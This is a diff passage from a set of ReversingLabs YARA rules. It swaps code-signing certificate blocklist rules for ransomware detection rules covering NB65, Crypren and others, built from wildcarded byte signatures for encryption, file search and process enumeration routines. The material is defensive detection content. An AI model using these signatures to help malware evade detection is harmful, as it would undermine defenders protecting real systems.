+            F0 89 73 ?? BA ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0
+            8D 46 ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 ?? 8B C6 C6
+            40 ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73
+            ?? 8B C6 C6 40 ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            89 43 ?? 8B 73 ?? 8D 46 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 46 ?? 33 D2 E8 ?? ?? ??
+            ?? C6 46 ?? ?? C6 46 ?? ?? C6 46 ?? ?? C6 46 ?? ?? C6 46 ?? ?? 8D 46 ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 43 ?? B2 ?? A1 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 89 43 ?? 8B 73 ?? 8D 46 ?? 33 D2 E8 ?? ?? ?? ?? 8D 46 ?? BA ?? ?? ??
+            ?? E8
+        }
+		$search_config_file = {
+            8B C0 53 56 8B F0 8A 9E ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 80 BE ?? ?? ?? ?? ?? 75 ??
+            8B 46 ?? 8B 48 ?? A1 ?? ?? ?? ?? 33 D2 E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 33 D2 8B
+            86 ?? ?? ?? ?? FF 96 ?? ?? ?? ?? 83 BE ?? ?? ?? ?? ?? 74 ?? 8B 96 ?? ?? ?? ?? B8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 89 B6 ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ??
+            EB ?? 89 B6 ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ?? 88 9E ?? ?? ?? ?? 8A 96 ?? ??
+            ?? ?? 8B C6 E8 ?? ?? ?? ?? 80 BE ?? ?? ?? ?? ?? 74 ?? 8B 46 ?? 8B 8E ?? ?? ?? ?? 8B
+            96 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8B 46 ?? E8 ?? ?? ?? ?? 8B 46 ?? 89
+            70 ?? 5E 5B C3
+        }
+		$track_mouse_event_for_entropy = {
+            53 56 83 C4 ?? 8B F0 8B 42 ?? 05 ?? ?? ?? ?? 83 E8 ?? 72 ?? 2D ?? ?? ?? ?? 0F 84 ??
+            ?? ?? ?? E9 ?? ?? ?? ?? 8A 86 ?? ?? ?? ?? 88 44 24 ?? 66 83 BE ?? ?? ?? ?? ?? 74 ??
+            8B D6 8B 86 ?? ?? ?? ?? FF 96 ?? ?? ?? ?? 8B D8 EB ?? 54 E8 ?? ?? ?? ?? 8D 4C 24 ??
+            8B D4 8B C6 E8 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 8B 44 24 ?? 89 44 24 ?? 8D 54 24 ??
+            8B C6 E8 ?? ?? ?? ?? 8D 54 24 ?? 8B C4 E8 ?? ?? ?? ?? 8B D8 3A 5C 24 ?? 0F 84 ?? ??
+            ?? ?? 8B C6 E8 ?? ?? ?? ?? 84 DB 74 ?? C6 86 ?? ?? ?? ?? ?? 66 83 BE ?? ?? ?? ?? ??
+            74 ?? 8B D6 8B 86 ?? ?? ?? ?? FF 96 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? 8B 46 ?? 89 44 24 ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? EB
+            ?? C6 86 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 46 ?? 89
+            44 24 ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 66 83 BE ?? ?? ?? ?? ?? 74 ?? 8B D6 8B 86 ?? ??
+            ?? ?? FF 96 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? EB ?? 80 BE ?? ?? ?? ?? ?? 74 ?? C6 86
+            ?? ?? ?? ?? ?? 66 83 BE ?? ?? ?? ?? ?? 74 ?? 8B D6 8B 86 ?? ?? ?? ?? FF 96 ?? ?? ??
+            ?? 8B C6 E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 5E 5B C3
+        }
+		$find_files_p1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B FA
+            8B D8 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ??
+            ?? B9 ?? ?? ?? ?? 8B D7 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 43 ?? 8D 85 ?? ?? ?? ??
+            8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 33 C9 8A 08 41 E8
+            ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ??
+            0F 84 ?? ?? ?? ?? 80 7B ?? ?? 76 ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B D7 8B C3 E8 ?? ?? ?? ?? 80 7B ?? ?? 0F 85 ??
+            ?? ?? ?? 57 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 43 ?? E9 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 53 ?? E8 ?? ?? ?? ?? 84 C0 74 ?? FF 43
+        }
+		$find_files_p2 = {
+            80 7B ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B D7 8B C3 E8 ?? ?? ?? ?? EB ?? 80 7B ?? ?? 74 ?? 8D
+            85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 8B D7 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 43 ?? E8 ?? ?? ?? ?? EB ??
+            8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
+            8D 43 ?? E8 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+		$encrypt_files = {
+            8B C0 33 D2 89 50 ?? 89 50 ?? 52 8D 50 ?? 52 FF 70 ?? FF 70 ?? FF 30 E8 ?? ?? ?? ??
+            85 C0 74 ?? 33 C0 C3 E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? C3 33 C0 C3 51 8B 50 ?? 85 D2 7E
+            ?? 33 C9 89 48 ?? 51 8D 4C 24 ?? 51 52 FF 70 ?? FF 30 E8 ?? ?? ?? ?? 85 C0 74 ?? 33
+            C0 59 C3 E8 ?? ?? ?? ?? EB ?? FF 30 C7 40 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 75 ?? C3
+            E8 ?? ?? ?? ?? C3 56 8B F0 33 C0 89 46 ?? 89 46 ?? 8B 46 ?? 2D ?? ?? ?? ?? 74 ?? 48
+            74 ?? 48 74 ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 46 ??
+            ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ??
+            BA ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ??
+            ?? ?? ?? 80 7E ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 51 6A ?? 52 50 8D 46 ??
+            50 E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 89 06 81 7E ?? ?? ?? ?? ?? 0F 85 ?? ??
+            ?? ?? FF 4E ?? 6A ?? FF 36 E8 ?? ?? ?? ?? 40 0F 84 ?? ?? ?? ?? 2D ?? ?? ?? ?? 73 ??
+            33 C0 6A ?? 6A ?? 50 FF 36 E8 ?? ?? ?? ?? 40 0F 84 ?? ?? ?? ?? 6A ?? 8B D4 6A ?? 52
+            68 ?? ?? ?? ?? 8D 96 ?? ?? ?? ?? 52 FF 36 E8 ?? ?? ?? ?? 5A 48 0F 85 ?? ?? ?? ?? 33
+            C0 3B C2 73 ?? 80 BC 06 ?? ?? ?? ?? ?? 74 ?? 40 EB ?? 6A ?? 6A ?? 2B C2 50 FF 36 E8
+            ?? ?? ?? ?? 40 74 ?? FF 36 E8 ?? ?? ?? ?? 48 75 ?? EB ?? C7 46 ?? ?? ?? ?? ?? 81 7E
+            ?? ?? ?? ?? ?? 74 ?? 6A ?? EB ?? 6A ?? E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 89 06 81 7E ??
+            ?? ?? ?? ?? 74 ?? FF 36 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 F8 ?? 75 ?? C7 46 ?? ?? ?? ??
+            ?? 33 C0 5E C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DREAM SECURITY USA INC" and pe.signatures [ i ] . serial == "4c:8d:ef:29:44:78:b7:d5:9e:e9:5c:61:fa:e3:d9:65" and 1592961292 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $search_config_file ) and ( all of ( $find_files_p* ) ) and ( $track_mouse_event_for_entropy ) and ( $encrypt_files ) and ( all of ( $show_ransom_note_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_7D36Cbb64Bc9Add17Ba71737D3Ecceca : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_NB65 : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects NB65 ransomware."
 		author = "ReversingLabs"
-		id = "ce10840c-150d-5ecd-ab9a-7bc96092ebfd"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "1aba009e-8065-5fb0-98e7-a595cb324076"
+		date = "2022-06-01"
+		modified = "2022-06-01"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6938-L6954"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5874860582ed5be6908dca38e6ecae831eeeb0c2b768e8065ada9fd5ac2bda89"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.NB65.yara#L1-L68"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f8a0e265fc72a9f017b37ce4b6dbb878285a5d298ab1b8c69f9fde7159426981"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "NB65"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LTD SERVICES LIMITED" and pe.signatures [ i ] . serial == "7d:36:cb:b6:4b:c9:ad:d1:7b:a7:17:37:d3:ec:ce:ca" and 1616025600 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_Ad255D4Ebefa751F3782587396C08629 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "e42d2881-efda-5aa0-b455-dabbd3a77e97"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6956-L6974"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "43f44cbedf37094416628c9df23767be3b036519f93222812597777a146ecb24"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files = {
+            E8 ?? ?? ?? ?? 89 45 ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ??
+            C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ??
+            C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ??
+            C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ??
+            C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8A 45 ?? 80 7D ?? ?? 75 ?? 33 C9 90 8A 44 0D ??
+            0F B6 C0 83 E8 ?? 6B C0 ?? 99 F7 FB 8D 42 ?? 99 F7 FB 88 54 0D ?? 41 83 F9 ?? 72 ??
+            8D 45 ?? 89 45 ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 50
+            ?? 33 C9 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 81 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D0
+            85 C0 75 ?? 33 F6 66 90 A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ??
+            8D 50 ?? 33 C9 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 81 ?? ?? ?? ?? FF B4 B5 ?? ?? ??
+            ?? 57 FF D0 85 C0 75 ?? 46 83 FE ?? 7C ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3
+        }
+		$find_files = {
+            57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? ?? 83 FE ?? 75 ?? 50 57 57
+            53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ??
+            5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ??
+            80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 80 BD ?? ??
+            ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ??
+            85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ??
+            8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
+        }
+		$enum_procs = {
+            33 C9 66 90 8A 84 0D ?? ?? ?? ?? 0F B6 C0 83 E8 ?? 8D 04 C0 99 F7 BD ?? ?? ?? ?? 8D
+            42 ?? 99 F7 BD ?? ?? ?? ?? 88 94 0D ?? ?? ?? ?? 41 83 F9 ?? 72 ?? A1 ?? ?? ?? ?? 8B
+            40 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 33 D2 33 C9 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 41
+            ?? 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? 51 FF D0 85 C0 75 ?? 6A ?? E8 ?? ?? ?? ??
+            83 C4 ?? 85 C0 74 ?? C7 00 ?? ?? ?? ?? 8D 50 ?? 8B 8D ?? ?? ?? ?? 89 08 C7 02 ?? ??
+            ?? ?? 8B 4E ?? 89 48 ?? 8B 4E ?? 89 01 89 56 ?? 8D 85 ?? ?? ?? ?? 50 57 FF D3 85 C0
+            0F 85 ?? ?? ?? ?? 5B A1 ?? ?? ?? ?? 8B 40 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 33 D2 33 C9
+            E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 41 ?? 57 FF D0 8B 4D ?? 5F 33 CD 5E E8 ?? ?? ??
+            ?? 8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Ornitek" and ( pe.signatures [ i ] . serial == "00:ad:25:5d:4e:be:fa:75:1f:37:82:58:73:96:c0:86:29" or pe.signatures [ i ] . serial == "ad:25:5d:4e:be:fa:75:1f:37:82:58:73:96:c0:86:29" ) and 1614643200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $enum_procs ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_262Ca7Ae19D688138E75932832B18F9D : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Crypren : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Crypren ransomware."
 		author = "ReversingLabs"
-		id = "7151fd62-7f6c-59d7-800b-65e5b4db279b"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "9a6ff190-b26b-5b75-9103-95a3b2e80701"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6976-L6992"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a5bb946c6199cd47a087ac26f0a996261318d1830191ea7c0e7797ff03984558"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Crypren.yara#L1-L144"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7047d48782762e42544063fde6f2be62eb19f22853ea84abb5bce67c962da172"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Crypren"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bisoyetutu Ltd Ltd" and pe.signatures [ i ] . serial == "26:2c:a7:ae:19:d6:88:13:8e:75:93:28:32:b1:8f:9d" and 1616025600 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_59A57E8Ba3Dcf2B6F59981Fda14B03 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "12c80895-57fd-5341-b3ef-d59c25d4c234"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6994-L7010"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6e77c7d0bd7e5e9bc8880cc6ffc3f5f4f738e3dde22c270ad7a6f6672a99de53"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$enum_directories_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6
+            45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6
+            45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
+        }
+		$enum_directories_p2 = {
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6
+            45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 85 ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6
+        }
+		$enum_directories_p3 = {
+            45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45
+            ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D BD ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? 90 83 7F ?? ?? 8B 5F ?? 72 ?? 8B 37 EB ?? 8B F7 83 7D ?? ?? 8D
+            45 ?? 8B D3 0F 43 45 ?? 3B CB 0F 42 D1 85 D2 74 ?? 83 EA ?? 72 ?? 8D 9B ?? ?? ?? ??
+            8B 08 3B 0E 75 ?? 83 C0 ?? 83 C6 ?? 83 EA ?? 73 ?? 83 FA ?? 74 ?? 8A 08 3A 0E 75 ??
+            83 FA ?? 74 ?? 8A 48 ?? 3A 4E ?? 75 ?? 83 FA ?? 74 ?? 8A 48 ?? 3A 4E ?? 75 ?? 83 FA
+            ?? 74 ?? 8A 40 ?? 3A 46 ?? 74 ?? 1B C0 83 C8 ?? EB ?? 33 C0 8B 4D ?? 85 C0 75 ?? 3B
+            CB 73 ?? 83 C8 ?? EB ?? 33 C0 3B CB 0F 95 C0 85 C0 0F 94 C0 84 C0 75 ?? 8B 85 ?? ??
+            ?? ?? 83 C7 ?? 40 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? B3 ?? EB ?? 32 DB 68
+            ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ??
+            72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8A C3 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E
+            5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? C7 45
